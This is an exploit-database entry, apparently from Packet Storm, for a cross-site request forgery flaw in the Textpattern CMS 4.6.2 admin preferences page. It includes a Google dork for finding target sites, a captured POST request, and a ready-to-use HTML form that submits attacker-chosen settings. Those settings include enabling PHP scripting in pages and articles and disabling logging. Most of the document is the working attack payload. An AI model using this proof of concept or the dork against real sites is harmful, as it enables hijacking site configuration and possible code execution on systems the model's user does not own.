Share
## https://sploitus.com/exploit?id=PACKETSTORM:159620
# Exploit Title: Textpattern CMS 4.6.2 - Cross-site Request Forgery
# Exploit Author: Alperen Ergel
# Contact: @alpren_ae
# Software Homepage: https://textpattern.com/
# Version : 4.6.2
# Tested on: windows 10 / xammp
# Category: WebApp
# Google Dork: intext:"Published with Textpattern CMS"
# Date: 2020-10-29
######## Description ########
#
# 1-) Loggin administrator page
#
# 2-) Go admin > prefs > site
#
# 3-) All inputs vulnerable to CSRF
#
#
######## Proof of Concept ########
========>>> REQUEST <<<=========
POST /textpattern/textpattern/index.php?event=prefs HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/textpattern/textpattern/index.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 1806
Connection: close
Cookie: txp_login=localhost%2Ca170e235c4f2f59bb1300272c470807d; txp_login_public=a834cbdc8blocalhost; __atuvc=1%7C40
Upgrade-Insecure-Requests: 1
Submit=Save&sitename=victim+site&siteurl=victimurl.com&site_slogan=victimslogan&production_status=testing&timezone_key=Europe%2FBerlin&auto_dst=0&
is_dst=0&dateformat=since&archive_dateformat=%25b+%25Oe%2C+%25I%3A%25M+%25p&permlink_mode=section_id_title&doctype=html5&logging=none&expire_logs_after=7&
use_comments=1&img_dir=images&skin_dir=themes&file_base_path=%2Fvar%2Fwww%2Fvhosts%2Flocalhost%2Fhttpdocs%2Ftextpattern%2Ffiles&
file_max_upload_size=2000000&tempdir=%2Fvar%2Fwww%2Fvhosts%2Flocalhost%2Fhttpdocs%2Ftextpattern%2Ftextpattern%2Ftmp&plugin_cache_dir=&
smtp_from=&publisher_email=&override_emailcharset=0&enable_xmlrpc_server=0&default_event=article&theme_name=hive&module_pophelp=1&default_publish_status=4&
title_no_widow=0&articles_use_excerpts=1&allow_form_override=1&attach_titles_to_permalinks=1&permlink_format=1&send_lastmod=1&publish_expired_articles=0&use_textile=1&enable_short_tags=1&
use_plugins=1&admin_side_plugins=1&allow_page_php_scripting=1&allow_article_php_scripting=1&max_url_len=1000&syndicate_body_or_excerpt=1&rss_how_many=5&show_comment_count_in_feed=1&
include_email_atom=0&use_mail_on_feeds_id=0&comments_on_default=0&comments_default_invite=Comment&comments_moderate=1&comments_disabled_after=42&comments_auto_append=0&
comments_mode=0&comments_dateformat=%25b+%25Oe%2C+%25I%3A%25M+%25p&comments_sendmail=0&comments_are_ol=1&comment_means_site_updated=1&
comments_require_name=1&comments_require_email=1&never_display_email=1&comment_nofollow=1&comments_disallow_images=0&comments_use_fat_textile=0&spam_blacklists=&
custom_1_set=custom1&custom_2_set=custom2&custom_3_set=&custom_4_set=&custom_5_set=&custom_6_set=&custom_7_set=&custom_8_set=&custom_9_set=&custom_10_set=&
step=prefs_save&event=prefs&_txp_token=0342db47efb6882b488f6d367067d720
### EXPLOIT ####
<html>
<!-- CSRF PoC -->
<body>
<form action="https://localhost/textpattern/textpattern/index.php" method="POST">
<input type="hidden" name="Submit" value="Save" />
<input type="hidden" name="sitename" value="CHANGEHERE" />
<input type="hidden" name="siteurl" value="CHANGEHERE" />
<input type="hidden" name="site_slogan" value="CHANGEHERE" />
<input type="hidden" name="production_status" value="testing" />
<input type="hidden" name="timezone_key" value="Europe/Berlin" />
<input type="hidden" name="auto_dst" value="0" />
<input type="hidden" name="is_dst" value="0" />
<input type="hidden" name="dateformat" value="since" />
<input type="hidden" name="archive_dateformat" value="%b %Oe, %I:%M %p" />
<input type="hidden" name="permlink_mode" value="section_id_title" />
<input type="hidden" name="doctype" value="html5" />
<input type="hidden" name="logging" value="none" />
<input type="hidden" name="expire_logs_after" value="7" />
<input type="hidden" name="use_comments" value="1" />
<input type="hidden" name="img_dir" value="images" />
<input type="hidden" name="skin_dir" value="themes" />
<input type="hidden" name="file_base_path" value="/var/www/vhosts/.demo.localhost./httpdocs/textpattern/files" />
<input type="hidden" name="file_max_upload_size" value="2000000" />
<input type="hidden" name="tempdir" value="/var/www/vhosts/.demo.localhost./httpdocs/textpattern/textpattern/tmp" />
<input type="hidden" name="plugin_cache_dir" value="" />
<input type="hidden" name="smtp_from" value="" />
<input type="hidden" name="publisher_email" value="" />
<input type="hidden" name="override_emailcharset" value="0" />
<input type="hidden" name="enable_xmlrpc_server" value="0" />
<input type="hidden" name="default_event" value="article" />
<input type="hidden" name="theme_name" value="hive" />
<input type="hidden" name="module_pophelp" value="1" />
<input type="hidden" name="default_publish_status" value="4" />
<input type="hidden" name="title_no_widow" value="0" />
<input type="hidden" name="articles_use_excerpts" value="1" />
<input type="hidden" name="allow_form_override" value="1" />
<input type="hidden" name="attach_titles_to_permalinks" value="1" />
<input type="hidden" name="permlink_format" value="1" />
<input type="hidden" name="send_lastmod" value="1" />
<input type="hidden" name="publish_expired_articles" value="0" />
<input type="hidden" name="use_textile" value="1" />
<input type="hidden" name="enable_short_tags" value="1" />
<input type="hidden" name="use_plugins" value="1" />
<input type="hidden" name="admin_side_plugins" value="1" />
<input type="hidden" name="allow_page_php_scripting" value="1" />
<input type="hidden" name="allow_article_php_scripting" value="1" />
<input type="hidden" name="max_url_len" value="1000" />
<input type="hidden" name="syndicate_body_or_excerpt" value="1" />
<input type="hidden" name="rss_how_many" value="5" />
<input type="hidden" name="show_comment_count_in_feed" value="1" />
<input type="hidden" name="include_email_atom" value="0" />
<input type="hidden" name="use_mail_on_feeds_id" value="0" />
<input type="hidden" name="comments_on_default" value="0" />
<input type="hidden" name="comments_default_invite" value="Comment" />
<input type="hidden" name="comments_moderate" value="1" />
<input type="hidden" name="comments_disabled_after" value="42" />
<input type="hidden" name="comments_auto_append" value="0" />
<input type="hidden" name="comments_mode" value="0" />
<input type="hidden" name="comments_dateformat" value="%b %Oe, %I:%M %p" />
<input type="hidden" name="comments_sendmail" value="0" />
<input type="hidden" name="comments_are_ol" value="1" />
<input type="hidden" name="comment_means_site_updated" value="1" />
<input type="hidden" name="comments_require_name" value="1" />
<input type="hidden" name="comments_require_email" value="1" />
<input type="hidden" name="never_display_email" value="1" />
<input type="hidden" name="comment_nofollow" value="1" />
<input type="hidden" name="comments_disallow_images" value="0" />
<input type="hidden" name="comments_use_fat_textile" value="0" />
<input type="hidden" name="spam_blacklists" value="" />
<input type="hidden" name="custom_1_set" value="custom1" />
<input type="hidden" name="custom_2_set" value="custom2" />
<input type="hidden" name="custom_3_set" value="" />
<input type="hidden" name="custom_4_set" value="" />
<input type="hidden" name="custom_5_set" value="" />
<input type="hidden" name="custom_6_set" value="" />
<input type="hidden" name="custom_7_set" value="" />
<input type="hidden" name="custom_8_set" value="" />
<input type="hidden" name="custom_9_set" value="" />
<input type="hidden" name="custom_10_set" value="" />
<input type="hidden" name="step" value="prefs_save" />
<input type="hidden" name="event" value="prefs" />
<input type="hidden" name="_txp_token" value="0342db47efb6882b488f6d367067d720" />
<input type="submit" value="Do Action" />
</form>
</body>
</html>